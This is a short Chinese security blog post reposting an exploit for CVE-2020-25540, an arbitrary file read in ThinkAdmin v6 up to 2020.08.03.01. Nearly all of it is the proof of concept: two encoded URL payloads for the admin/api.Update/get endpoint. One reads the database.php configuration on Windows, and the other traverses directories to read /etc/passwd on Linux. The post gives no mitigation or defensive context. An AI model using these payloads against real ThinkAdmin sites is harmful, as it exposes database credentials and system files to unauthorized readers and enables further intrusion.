ThinkAdmin 6-任意文件读取—Hack之路

ThinkAdmin 6-任意文件读取

#开发作者:Hzllaga

#供应商主页:https://github.com/zoujingli/ThinkAdmin/

#软件链接:之前https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784efffbf72a2a386c5d5c43a9a

#版本:v6<=2020.08.03.01

#测试于:PHP7.4.7,Apache

#CVE:CVE-2020-25540

PoC:
On Windows read database.php payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
On Linux read /etc/passwd payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s

网站地址:https://www.hackzl.cn;发布者:hack之路,转转请注明出处:https://www.hackzl.cn/index.php/2020/09/21/thinkadmin-6-%e4%bb%bb%e6%84%8f%e6%96%87%e4%bb%b6%e8%af%bb%e5%8f%96-hack%e4%b9%8b%e8%b7%af/

发表评论

邮箱地址不会被公开。 必填项已用*标注